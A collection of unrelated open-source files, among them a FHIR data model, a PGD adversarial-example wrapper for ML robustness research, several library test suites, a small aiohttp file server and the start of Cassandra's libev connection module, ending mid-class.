d.addCallbacks(stuff_db, self.not_called)
d.addCallbacks(do_my_tests, self.not_called)
return d
if __name__ == '__main__':
main()
|
the-stack_0_3762 | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/ContactPoint
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from pydantic import Field
from . import element, fhirtypes
class ContactPoint(element.Element):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Details of a Technology mediated contact point (phone, fax, email, etc.).
Details for all kinds of technology mediated contact points for a person or
organization, including telephone, email, etc.
"""
resource_type = Field("ContactPoint", const=True)
period: fhirtypes.PeriodType = Field(
None,
alias="period",
title="Time period when the contact point was/is in use",
description=None,
# if property is element of this resource.
element_property=True,
)
rank: fhirtypes.PositiveInt = Field(
None,
alias="rank",
title="Specify preferred order of use (1 = highest)",
description=(
"Specifies a preferred order in which to use a set of contacts. "
"Contacts are ranked with lower values coming before higher values."
),
# if property is element of this resource.
element_property=True,
)
rank__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_rank", title="Extension field for ``rank``."
)
system: fhirtypes.Code = Field(
None,
alias="system",
title="phone | fax | email | pager | url | sms | other",
description=(
"Telecommunications form for contact point - what communications system"
" is required to make use of the contact."
),
# if property is element of this resource.
element_property=True,
        # note: Enum values can be used in validation,
        # but use at your own responsibility; read the official FHIR documentation.
enum_values=["phone", "fax", "email", "pager", "url", "sms", "other"],
)
system__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_system", title="Extension field for ``system``."
)
use: fhirtypes.Code = Field(
None,
alias="use",
title="home | work | temp | old | mobile - purpose of this contact point",
description="Identifies the purpose for the contact point.",
# if property is element of this resource.
element_property=True,
        # note: Enum values can be used in validation,
        # but use at your own responsibility; read the official FHIR documentation.
enum_values=["home", "work", "temp", "old", "mobile"],
)
use__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_use", title="Extension field for ``use``."
)
value: fhirtypes.String = Field(
None,
alias="value",
title="The actual contact point details",
description=(
"The actual contact point details, in a form that is meaningful to the "
"designated communication system (i.e. phone number or email address)."
),
# if property is element of this resource.
element_property=True,
)
value__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_value", title="Extension field for ``value``."
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``ContactPoint`` according specification,
with preserving original sequence order.
"""
return ["id", "extension", "system", "value", "use", "rank", "period"]
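# Illustrative construction (values are examples only; this is a plain pydantic model):
#   cp = ContactPoint(system="phone", value="+1 555 0100", use="work", rank=1)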
|
the-stack_0_3767 | import numpy as np
from cleverhans.attacks import ProjectedGradientDescent
from tools.cleverhans.adversarial_attack import AdversarialAttack
class PGDAttack(AdversarialAttack):
def __init__(self, model, targeted=False, step_size_iter=0.05, max_perturbation=0.3, n_iterations=10,
norm_order=np.inf, rand_init=None, rand_minmax=0.3, clip_min=None, clip_max=None, sanity_checks=True):
super().__init__(model=model, clip_min=clip_min, clip_max=clip_max)
self._targeted = targeted
self._step_size_iter = step_size_iter
self._max_perturbation = max_perturbation
self._n_iterations = n_iterations
self._norm_order = norm_order
self._rand_init = rand_init
self._rand_minmax = rand_minmax
self._sanity_checks = sanity_checks
with self.graph.as_default():
self._method = ProjectedGradientDescent(self._model, sess=self.session, eps=self._max_perturbation,
eps_iter=self._step_size_iter, nb_iter=self._n_iterations,
ord=self._norm_order, rand_init=self._rand_init,
clip_min=self._clip_min, clip_max=self._clip_max,
sanity_checks=self._sanity_checks)
def attack_method(self, labels):
if labels is not None:
if self._targeted:
return self._method.generate(x=self._x_clean, y_target=labels, rand_minmax=self._rand_minmax)
else:
return self._method.generate(x=self._x_clean, y=labels, rand_minmax=self._rand_minmax)
return self._method.generate(x=self._x_clean, rand_minmax=self._rand_minmax)
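# Illustrative construction only (the AdversarialAttack base API lives in
# tools.cleverhans and is not shown here; `wrapped_model` is a placeholder for a
# cleverhans-compatible model wrapper):
#   attack = PGDAttack(wrapped_model, max_perturbation=8 / 255, step_size_iter=2 / 255,
#                      n_iterations=10, clip_min=0.0, clip_max=1.0)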
|
the-stack_0_3768 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle
import os
import warnings
import paddle.utils.cpp_extension.extension_utils as utils
class TestABIBase(unittest.TestCase):
def test_environ(self):
compiler_list = ['gcc', 'cl']
for compiler in compiler_list:
for flag in ['1', 'True', 'true']:
os.environ['PADDLE_SKIP_CHECK_ABI'] = flag
self.assertTrue(utils.check_abi_compatibility(compiler))
def del_environ(self):
key = 'PADDLE_SKIP_CHECK_ABI'
if key in os.environ:
del os.environ[key]
class TestCheckCompiler(TestABIBase):
def test_expected_compiler(self):
if utils.OS_NAME.startswith('linux'):
gt = ['gcc', 'g++', 'gnu-c++', 'gnu-cc']
elif utils.IS_WINDOWS:
gt = ['cl']
elif utils.OS_NAME.startswith('darwin'):
gt = ['clang', 'clang++']
self.assertListEqual(utils._expected_compiler_current_platform(), gt)
def test_compiler_version(self):
# clear environ
self.del_environ()
if utils.OS_NAME.startswith('linux'):
compiler = 'g++'
elif utils.IS_WINDOWS:
compiler = 'cl'
# Linux: all CI gcc version > 5.4.0
# Windows: all CI MSVC version > 19.00.24215
# Mac: clang has no version limitation, always return true
self.assertTrue(utils.check_abi_compatibility(compiler, verbose=True))
def test_wrong_compiler_warning(self):
# clear environ
self.del_environ()
compiler = 'python' # fake wrong compiler
with warnings.catch_warnings(record=True) as error:
flag = utils.check_abi_compatibility(compiler, verbose=True)
# check return False
self.assertFalse(flag)
# check Compiler Compatibility WARNING
self.assertTrue(len(error) == 1)
self.assertTrue(
"Compiler Compatibility WARNING" in str(error[0].message))
def test_exception(self):
# clear environ
self.del_environ()
compiler = 'python' # fake command
if utils.OS_NAME.startswith('linux'):
def fake():
return [compiler]
# mock a fake function
raw_func = utils._expected_compiler_current_platform
utils._expected_compiler_current_platform = fake
with warnings.catch_warnings(record=True) as error:
flag = utils.check_abi_compatibility(compiler, verbose=True)
# check return False
self.assertFalse(flag)
# check ABI Compatibility WARNING
self.assertTrue(len(error) == 1)
self.assertTrue("Failed to check compiler version for" in
str(error[0].message))
# restore
utils._expected_compiler_current_platform = raw_func
class TestJITCompilerException(unittest.TestCase):
def test_exception(self):
with self.assertRaisesRegexp(RuntimeError,
"Failed to check Python interpreter"):
file_path = os.path.abspath(__file__)
utils._jit_compile(file_path, interpreter='fake_cmd', verbose=True)
class TestRunCMDException(unittest.TestCase):
def test_exception(self):
for verbose in [True, False]:
with self.assertRaisesRegexp(RuntimeError, "Failed to run command"):
cmd = "fake cmd"
utils.run_cmd(cmd, verbose)
if __name__ == '__main__':
unittest.main()
|
the-stack_0_3769 |
def melt(df):
"""Melt a census dataframe into two value columns, for the estimate and margin"""
import pandas as pd
# Intial melt
melted = pd.melt(df, id_vars=list(df.columns[:9]), value_vars=list(df.columns[9:]))
melted = melted[['gvid', 'variable', 'value']]
# Make two seperate frames for estimates and margins.
estimates = melted[~melted.variable.str.contains('_m90')].set_index(['gvid', 'variable'])
margins = melted[melted.variable.str.contains('_m90')].copy()
margins.columns = ['gvid', 'ovariable', 'm90']
margins['variable'] = margins.ovariable.str.replace('_m90', '')
# Join the estimates to the margins.
final = estimates.join(margins.set_index(['gvid', 'variable']).drop('ovariable', 1))
return final
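# Sketch of expected input/output (column names are hypothetical): the input frame's
# first nine columns are identifiers and the remaining columns come in estimate/margin
# pairs such as b01001_001 / b01001_001_m90.
#
#   long_df = melt(census_df)
#   # long_df is indexed by (gvid, variable) and carries two columns: value and m90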
# From http://stackoverflow.com/a/295466
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
    and converts spaces to hyphens.
"""
import re
import unicodedata
from six import text_type
value = text_type(value)
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('utf8')
value = re.sub(r'[^\w\s-]', '-', value).strip().lower()
value = re.sub(r'[-\s]+', '-', value)
return value
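# For example: slugify("Café au Lait") returns 'cafe-au-lait'.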
CACHE_NAME = 'pandasreporter'
def nl2br(v, is_xhtml=True):
    if is_xhtml:
        return v.replace('\n','<br />\n')
    else:
return v.replace('\n','<br>\n') |
the-stack_0_3770 | #!/usr/bin/env python3
# Copyright (c) 2015-2020 The Beans Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multisig RPCs"""
import binascii
import decimal
import itertools
import json
import os
from test_framework.authproxy import JSONRPCException
from test_framework.descriptors import descsum_create, drop_origins
from test_framework.key import ECPubKey, ECKey
from test_framework.test_framework import BeansTestFramework
from test_framework.util import (
assert_raises_rpc_error,
assert_equal,
)
from test_framework.wallet_util import bytes_to_wif
class RpcCreateMultiSigTest(BeansTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def get_keys(self):
self.pub = []
self.priv = []
node0, node1, node2 = self.nodes
for _ in range(self.nkeys):
k = ECKey()
k.generate()
self.pub.append(k.get_pubkey().get_bytes().hex())
self.priv.append(bytes_to_wif(k.get_bytes(), k.is_compressed))
self.final = node2.getnewaddress()
def run_test(self):
node0, node1, node2 = self.nodes
self.check_addmultisigaddress_errors()
self.log.info('Generating blocks ...')
node0.generate(149)
self.sync_all()
self.moved = 0
for self.nkeys in [3, 5]:
for self.nsigs in [2, 3]:
for self.output_type in ["bech32", "p2sh-segwit", "legacy"]:
self.get_keys()
self.do_multisig()
self.checkbalances()
# Test mixed compressed and uncompressed pubkeys
self.log.info('Mixed compressed and uncompressed multisigs are not allowed')
pk0 = node0.getaddressinfo(node0.getnewaddress())['pubkey']
pk1 = node1.getaddressinfo(node1.getnewaddress())['pubkey']
pk2 = node2.getaddressinfo(node2.getnewaddress())['pubkey']
# decompress pk2
pk_obj = ECPubKey()
pk_obj.set(binascii.unhexlify(pk2))
pk_obj.compressed = False
pk2 = binascii.hexlify(pk_obj.get_bytes()).decode()
node0.createwallet(wallet_name='wmulti0', disable_private_keys=True)
wmulti0 = node0.get_wallet_rpc('wmulti0')
# Check all permutations of keys because order matters apparently
for keys in itertools.permutations([pk0, pk1, pk2]):
# Results should be the same as this legacy one
legacy_addr = node0.createmultisig(2, keys, 'legacy')['address']
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'legacy')['address'])
# Generate addresses with the segwit types. These should all make legacy addresses
assert_equal(legacy_addr, wmulti0.createmultisig(2, keys, 'bech32')['address'])
assert_equal(legacy_addr, wmulti0.createmultisig(2, keys, 'p2sh-segwit')['address'])
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'bech32')['address'])
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'p2sh-segwit')['address'])
self.log.info('Testing sortedmulti descriptors with BIP 67 test vectors')
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/rpc_bip67.json'), encoding='utf-8') as f:
vectors = json.load(f)
for t in vectors:
key_str = ','.join(t['keys'])
desc = descsum_create('sh(sortedmulti(2,{}))'.format(key_str))
assert_equal(self.nodes[0].deriveaddresses(desc)[0], t['address'])
sorted_key_str = ','.join(t['sorted_keys'])
sorted_key_desc = descsum_create('sh(multi(2,{}))'.format(sorted_key_str))
assert_equal(self.nodes[0].deriveaddresses(sorted_key_desc)[0], t['address'])
def check_addmultisigaddress_errors(self):
if self.options.descriptors:
return
self.log.info('Check that addmultisigaddress fails when the private keys are missing')
addresses = [self.nodes[1].getnewaddress(address_type='legacy') for _ in range(2)]
assert_raises_rpc_error(-5, 'no full public key for address', lambda: self.nodes[0].addmultisigaddress(nrequired=1, keys=addresses))
for a in addresses:
# Importing all addresses should not change the result
self.nodes[0].importaddress(a)
assert_raises_rpc_error(-5, 'no full public key for address', lambda: self.nodes[0].addmultisigaddress(nrequired=1, keys=addresses))
def checkbalances(self):
node0, node1, node2 = self.nodes
node0.generate(100)
self.sync_all()
bal0 = node0.getbalance()
bal1 = node1.getbalance()
bal2 = node2.getbalance()
height = node0.getblockchaininfo()["blocks"]
assert 150 < height < 350
total = 149 * 50 + (height - 149 - 100) * 25
assert bal1 == 0
assert bal2 == self.moved
assert bal0 + bal1 + bal2 == total
def do_multisig(self):
node0, node1, node2 = self.nodes
if 'wmulti' not in node1.listwallets():
try:
node1.loadwallet('wmulti')
except JSONRPCException as e:
path = os.path.join(self.options.tmpdir, "node1", "regtest", "wallets", "wmulti")
if e.error['code'] == -18 and "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path) in e.error['message']:
node1.createwallet(wallet_name='wmulti', disable_private_keys=True)
else:
raise
wmulti = node1.get_wallet_rpc('wmulti')
# Construct the expected descriptor
desc = 'multi({},{})'.format(self.nsigs, ','.join(self.pub))
if self.output_type == 'legacy':
desc = 'sh({})'.format(desc)
elif self.output_type == 'p2sh-segwit':
desc = 'sh(wsh({}))'.format(desc)
elif self.output_type == 'bech32':
desc = 'wsh({})'.format(desc)
desc = descsum_create(desc)
msig = node2.createmultisig(self.nsigs, self.pub, self.output_type)
madd = msig["address"]
mredeem = msig["redeemScript"]
assert_equal(desc, msig['descriptor'])
if self.output_type == 'bech32':
assert madd[0:4] == "bcrt" # actually a bech32 address
# compare against addmultisigaddress
msigw = wmulti.addmultisigaddress(self.nsigs, self.pub, None, self.output_type)
maddw = msigw["address"]
mredeemw = msigw["redeemScript"]
assert_equal(desc, drop_origins(msigw['descriptor']))
        # addmultisigaddress and createmultisig work the same
assert maddw == madd
assert mredeemw == mredeem
txid = node0.sendtoaddress(madd, 40)
tx = node0.getrawtransaction(txid, True)
vout = [v["n"] for v in tx["vout"] if madd == v["scriptPubKey"]["address"]]
assert len(vout) == 1
vout = vout[0]
scriptPubKey = tx["vout"][vout]["scriptPubKey"]["hex"]
value = tx["vout"][vout]["value"]
prevtxs = [{"txid": txid, "vout": vout, "scriptPubKey": scriptPubKey, "redeemScript": mredeem, "amount": value}]
node0.generate(1)
outval = value - decimal.Decimal("0.00001000")
rawtx = node2.createrawtransaction([{"txid": txid, "vout": vout}], [{self.final: outval}])
prevtx_err = dict(prevtxs[0])
del prevtx_err["redeemScript"]
assert_raises_rpc_error(-8, "Missing redeemScript/witnessScript", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# if witnessScript specified, all ok
prevtx_err["witnessScript"] = prevtxs[0]["redeemScript"]
node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# both specified, also ok
prevtx_err["redeemScript"] = prevtxs[0]["redeemScript"]
node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# redeemScript mismatch to witnessScript
prevtx_err["redeemScript"] = "6a" # OP_RETURN
assert_raises_rpc_error(-8, "redeemScript does not correspond to witnessScript", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# redeemScript does not match scriptPubKey
del prevtx_err["witnessScript"]
assert_raises_rpc_error(-8, "redeemScript/witnessScript does not match scriptPubKey", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# witnessScript does not match scriptPubKey
prevtx_err["witnessScript"] = prevtx_err["redeemScript"]
del prevtx_err["redeemScript"]
assert_raises_rpc_error(-8, "redeemScript/witnessScript does not match scriptPubKey", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
rawtx2 = node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs - 1], prevtxs)
rawtx3 = node2.signrawtransactionwithkey(rawtx2["hex"], [self.priv[-1]], prevtxs)
self.moved += outval
tx = node0.sendrawtransaction(rawtx3["hex"], 0)
blk = node0.generate(1)[0]
assert tx in node0.getblock(blk)["tx"]
txinfo = node0.getrawtransaction(tx, True, blk)
self.log.info("n/m=%d/%d %s size=%d vsize=%d weight=%d" % (self.nsigs, self.nkeys, self.output_type, txinfo["size"], txinfo["vsize"], txinfo["weight"]))
wmulti.unloadwallet()
if __name__ == '__main__':
RpcCreateMultiSigTest().main()
|
the-stack_0_3771 | import pytest
from unittest import mock
import mlflow
from mlflow.exceptions import MlflowException
import mlflow.spark
from mlflow._spark_autologging import _get_current_listener, PythonSubscriber
from tests.spark.autologging.utils import _get_or_create_spark_session
@pytest.fixture()
def spark_session():
session = _get_or_create_spark_session()
yield session
session.stop()
@pytest.fixture()
def mock_get_current_listener():
with mock.patch("mlflow._spark_autologging._get_current_listener") as get_listener_patch:
get_listener_patch.return_value = None
yield get_listener_patch
@pytest.mark.usefixtures("spark_session")
def test_autolog_call_idempotent():
mlflow.spark.autolog()
listener = _get_current_listener()
mlflow.spark.autolog()
assert _get_current_listener() == listener
def test_subscriber_methods():
# Test that PythonSubscriber satisfies the contract expected by the underlying Scala trait
# it implements (MlflowAutologEventSubscriber)
subscriber = PythonSubscriber()
subscriber.ping()
# Assert repl ID is stable & different between subscribers
assert subscriber.replId() == subscriber.replId()
assert PythonSubscriber().replId() != subscriber.replId()
def test_enabling_autologging_throws_for_wrong_spark_version(
spark_session, mock_get_current_listener
):
# pylint: disable=unused-argument
with mock.patch("mlflow._spark_autologging._get_spark_major_version") as get_version_mock:
get_version_mock.return_value = 2
with pytest.raises(
MlflowException, match="Spark autologging unsupported for Spark versions < 3"
):
mlflow.spark.autolog()
|
the-stack_0_3772 | from random import choice
import numpy as np
from tensorflow.python.keras.utils.data_utils import Sequence
from debvader.normalize import Normalizer
class COSMOSsequence(Sequence):
def __init__(
self,
list_of_samples,
x_col_name,
y_col_name,
batch_size,
num_iterations_per_epoch,
normalizer=None,
):
"""
initializes the Data generator
parameters:
list_of_samples: list of paths to the datafiles.
x_col_name: column name of data to be fed as input to the network
y_col_name: column name of data to be fed as target to the network
            batch_size: sample size for each batch
            num_iterations_per_epoch: number of batches (each of size batch_size) to be drawn per epoch
            normalizer: object of debvader.normalize.Normalizer, used to perform norm and denorm operations (default is None).
            channel_last: boolean to indicate if the last channel corresponds to different bands of the input data (not currently an argument of this constructor).
"""
self.list_of_samples = list_of_samples
self.x_col_name = x_col_name
self.y_col_name = y_col_name
self.batch_size = batch_size
self.num_iterations_per_epoch = num_iterations_per_epoch
if (normalizer is not None) and (not isinstance(normalizer, Normalizer)):
raise ValueError(
"The parameter `normalizer` should be an instance of debvader.normalize.Normalizer"
)
self.normalizer = normalizer
def __len__(self):
return self.num_iterations_per_epoch
def __getitem__(self, idx):
current_loop_file_name = choice(self.list_of_samples)
current_sample = np.load(current_loop_file_name, allow_pickle=True)
batch = np.random.choice(current_sample, size=self.batch_size, replace=False)
x = batch[self.x_col_name]
y = batch[self.y_col_name]
x = np.array(x.tolist())
y = np.array(y.tolist())
if self.normalizer is not None:
x = self.normalizer.forward(x)
y = self.normalizer.forward(y)
# flip : flipping the image array
# if not self.channel_last:
rand = np.random.randint(4)
if rand == 1:
x = np.flip(x, axis=-1)
y = np.flip(y, axis=-1)
elif rand == 2:
x = np.swapaxes(x, -1, -2)
y = np.swapaxes(y, -1, -2)
elif rand == 3:
x = np.swapaxes(np.flip(x, axis=-1), -1, -2)
y = np.swapaxes(np.flip(y, axis=-1), -1, -2)
# Change the shape of inputs and targets to feed the network
x = np.transpose(x, axes=(0, 2, 3, 1))
y = np.transpose(y, axes=(0, 2, 3, 1))
return x, y
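# Illustrative usage sketch (file paths, column names and the model are hypothetical):
#   train_gen = COSMOSsequence(train_files, "blended_stamps", "isolated_stamps",
#                              batch_size=32, num_iterations_per_epoch=400,
#                              normalizer=my_normalizer)
#   model.fit(train_gen, epochs=10)  # usable wherever a keras Sequence is accepted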
|
the-stack_0_3773 | from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
if rank == 0:
data = [1,3,5,7]
comm.send(data, dest=1)
if rank == 1:
info = MPI.Status()
data = comm.recv(source=0, status=info)
print("Received %d bytes of data." % info.Get_count())
print("Received %d integers." % info.Get_elements(MPI.INT))
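# This example needs at least two ranks; launch it with, e.g. (script name illustrative):
#   mpiexec -n 2 python send_recv.py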
|
the-stack_0_3774 | #!/usr/bin/env python3
"""Simple server written using an event loop."""
import argparse
import logging
import os
import sys
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import asyncio
import aiohttp
import aiohttp.server
class HttpRequestHandler(aiohttp.server.ServerHttpProtocol):
@asyncio.coroutine
def handle_request(self, message, payload):
print('method = {!r}; path = {!r}; version = {!r}'.format(
message.method, message.path, message.version))
path = message.path
if (not (path.isprintable() and path.startswith('/')) or '/.' in path):
print('bad path', repr(path))
path = None
else:
path = '.' + path
if not os.path.exists(path):
print('no file', repr(path))
path = None
else:
isdir = os.path.isdir(path)
if not path:
raise aiohttp.HttpProcessingError(code=404)
for hdr, val in message.headers.items():
print(hdr, val)
if isdir and not path.endswith('/'):
path = path + '/'
raise aiohttp.HttpProcessingError(
code=302, headers=(('URI', path), ('Location', path)))
response = aiohttp.Response(
self.writer, 200, http_version=message.version)
response.add_header('Transfer-Encoding', 'chunked')
# content encoding
accept_encoding = message.headers.get('accept-encoding', '').lower()
if 'deflate' in accept_encoding:
response.add_header('Content-Encoding', 'deflate')
response.add_compression_filter('deflate')
elif 'gzip' in accept_encoding:
response.add_header('Content-Encoding', 'gzip')
response.add_compression_filter('gzip')
response.add_chunking_filter(1025)
if isdir:
response.add_header('Content-type', 'text/html')
response.send_headers()
response.write(b'<ul>\r\n')
for name in sorted(os.listdir(path)):
if name.isprintable() and not name.startswith('.'):
try:
bname = name.encode('ascii')
except UnicodeError:
pass
else:
if os.path.isdir(os.path.join(path, name)):
response.write(b'<li><a href="' + bname +
b'/">' + bname + b'/</a></li>\r\n')
else:
response.write(b'<li><a href="' + bname +
b'">' + bname + b'</a></li>\r\n')
response.write(b'</ul>')
else:
response.add_header('Content-type', 'text/plain')
response.send_headers()
try:
with open(path, 'rb') as fp:
chunk = fp.read(8192)
while chunk:
response.write(chunk)
chunk = fp.read(8192)
except OSError:
response.write(b'Cannot open')
yield from response.write_eof()
if response.keep_alive():
self.keep_alive(True)
ARGS = argparse.ArgumentParser(description="Run simple HTTP server.")
ARGS.add_argument(
'--host', action="store", dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action="store", dest='port',
default=8080, type=int, help='Port number')
# make iocp and ssl mutually exclusive because ProactorEventLoop is
# incompatible with SSL
group = ARGS.add_mutually_exclusive_group()
group.add_argument(
'--iocp', action="store_true", dest='iocp', help='Windows IOCP event loop')
group.add_argument(
'--ssl', action="store_true", dest='ssl', help='Run ssl mode.')
ARGS.add_argument(
'--sslcert', action="store", dest='certfile', help='SSL cert file.')
ARGS.add_argument(
'--sslkey', action="store", dest='keyfile', help='SSL key file.')
def main():
args = ARGS.parse_args()
if ':' in args.host:
args.host, port = args.host.split(':', 1)
args.port = int(port)
if args.iocp:
from asyncio import windows_events
sys.argv.remove('--iocp')
logging.info('using iocp')
el = windows_events.ProactorEventLoop()
asyncio.set_event_loop(el)
if args.ssl:
here = os.path.join(os.path.dirname(__file__), 'tests')
if args.certfile:
certfile = args.certfile or os.path.join(here, 'sample.crt')
keyfile = args.keyfile or os.path.join(here, 'sample.key')
else:
certfile = os.path.join(here, 'sample.crt')
keyfile = os.path.join(here, 'sample.key')
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.load_cert_chain(certfile, keyfile)
else:
sslcontext = None
loop = asyncio.get_event_loop()
f = loop.create_server(
lambda: HttpRequestHandler(debug=True, keep_alive=75),
args.host, args.port,
ssl=sslcontext)
svr = loop.run_until_complete(f)
socks = svr.sockets
print('serving on', socks[0].getsockname())
try:
loop.run_forever()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
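# Example invocations (script name illustrative):
#   python srv.py --host 127.0.0.1 --port 8080
#   python srv.py --ssl --sslcert sample.crt --sslkey sample.key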
|
the-stack_0_3775 | import unittest
import threading
import queue
import time
import sys
sys.path.append("./functions")
import windows
class Streamer:
def __init__(self):
self.buffer = queue.Queue(maxsize=2)
def post(self, item):
if self.buffer.full():
#print("waiting")
self.buffer.join()
#print("post item")
self.buffer.put(item)
time.sleep(0.1)
def stream(self):
while True:
try:
yield self.buffer.get(timeout=1)
self.buffer.task_done()
except queue.Empty:
return
class MyTestCase(unittest.TestCase):
def test_streaming(self):
streamer = Streamer()
def post(count):
for i in range(count):
streamer.post("%d"%i)
thread = threading.Thread(target=post,args=[9])
thread.start()
for w in windows.discrete_window_text(streamer.stream()):
print(w)
thread.join()
if __name__ == '__main__':
unittest.main()
|
the-stack_0_3776 | # Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
from collections import deque
from functools import partial
import logging
import os
import socket
import ssl
from threading import Lock, Thread
import time
from six.moves import range
from cassandra.connection import (Connection, ConnectionShutdown,
NONBLOCKING, Timer, TimerManager)
try:
import cassandra.io.libevwrapper as libev
except ImportError:
raise ImportError(
"The C extension needed to use libev was not found. This "
"probably means that you didn't have the required build dependencies "
"when installing the driver. See "
"http://datastax.github.io/python-driver/installation.html#c-extensions "
"for instructions on installing build dependencies and building "
"the C extension.")
log = logging.getLogger(__name__)
def _cleanup(loop):
if loop:
loop._cleanup()
class LibevLoop(object):
def __init__(self):
self._pid = os.getpid()
self._loop = libev.Loop()
self._notifier = libev.Async(self._loop)
self._notifier.start()
# prevent _notifier from keeping the loop from returning
self._loop.unref()
self._started = False
self._shutdown = False
self._lock = Lock()
self._lock_thread = Lock()
self._thread = None
# set of all connections; only replaced with a new copy
# while holding _conn_set_lock, never modified in place
self._live_conns = set()
# newly created connections that need their write/read watcher started
self._new_conns = set()
# recently closed connections that need their write/read watcher stopped
self._closed_conns = set()
self._conn_set_lock = Lock()
self._preparer = libev.Prepare(self._loop, self._loop_will_run)
# prevent _preparer from keeping the loop from returning
self._loop.unref()
self._preparer.start()
self._timers = TimerManager()
self._loop_timer = libev.Timer(self._loop, self._on_loop_timer)
def maybe_start(self):
should_start = False
with self._lock:
if not self._started:
log.debug("Starting libev event loop")
self._started = True
should_start = True
if should_start:
with self._lock_thread:
if not self._shutdown:
self._thread = Thread(target=self._run_loop, name="event_loop")
self._thread.daemon = True
self._thread.start()
self._notifier.send()
def _run_loop(self):
while True:
self._loop.start()
# there are still active watchers, no deadlock
with self._lock:
if not self._shutdown and self._live_conns:
log.debug("Restarting event loop")
continue
else:
# all Connections have been closed, no active watchers
log.debug("All Connections currently closed, event loop ended")
self._started = False
break
def _cleanup(self):
self._shutdown = True
if not self._thread:
return
for conn in self._live_conns | self._new_conns | self._closed_conns:
conn.close()
for watcher in (conn._write_watcher, conn._read_watcher):
if watcher:
watcher.stop()
self.notify() # wake the timer watcher
# PYTHON-752 Thread might have just been created and not started
with self._lock_thread:
self._thread.join(timeout=1.0)
if self._thread.is_alive():
log.warning(
"Event loop thread could not be joined, so shutdown may not be clean. "
"Please call Cluster.shutdown() to avoid this.")
log.debug("Event loop thread was joined")
def add_timer(self, timer):
self._timers.add_timer(timer)
self._notifier.send() # wake up in case this timer is earlier
def _update_timer(self):
if not self._shutdown:
next_end = self._timers.service_timeouts()
if next_end:
self._loop_timer.start(next_end - time.time()) # timer handles negative values
else:
self._loop_timer.stop()
def _on_loop_timer(self):
self._timers.service_timeouts()
def notify(self):
self._notifier.send()
def connection_created(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.add(conn)
self._live_conns = new_live_conns
new_new_conns = self._new_conns.copy()
new_new_conns.add(conn)
self._new_conns = new_new_conns
def connection_destroyed(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.discard(conn)
self._live_conns = new_live_conns
new_closed_conns = self._closed_conns.copy()
new_closed_conns.add(conn)
self._closed_conns = new_closed_conns
self._notifier.send()
def _loop_will_run(self, prepare):
changed = False
for conn in self._live_conns:
if not conn.deque and conn._write_watcher_is_active:
if conn._write_watcher:
conn._write_watcher.stop()
conn._write_watcher_is_active = False
changed = True
elif conn.deque and not conn._write_watcher_is_active:
conn._write_watcher.start()
conn._write_watcher_is_active = True
changed = True
if self._new_conns:
with self._conn_set_lock:
to_start = self._new_conns
self._new_conns = set()
for conn in to_start:
conn._read_watcher.start()
changed = True
if self._closed_conns:
with self._conn_set_lock:
to_stop = self._closed_conns
self._closed_conns = set()
for conn in to_stop:
if conn._write_watcher:
conn._write_watcher.stop()
# clear reference cycles from IO callback
del conn._write_watcher
if conn._read_watcher:
conn._read_watcher.stop()
# clear reference cycles from IO callback
del conn._read_watcher
changed = True
# TODO: update to do connection management, timer updates through dedicated async 'notifier' callbacks
self._update_timer()
if changed:
self._notifier.send()
_global_loop = None
atexit.register(partial(_cleanup, _global_loop))
class LibevConnection(Connection):
"""
An implementation of :class:`.Connection` that uses libev for its event loop.
"""
_write_watcher_is_active = False
_read_watcher = None
_write_watcher = None
_socket = None
@classmethod
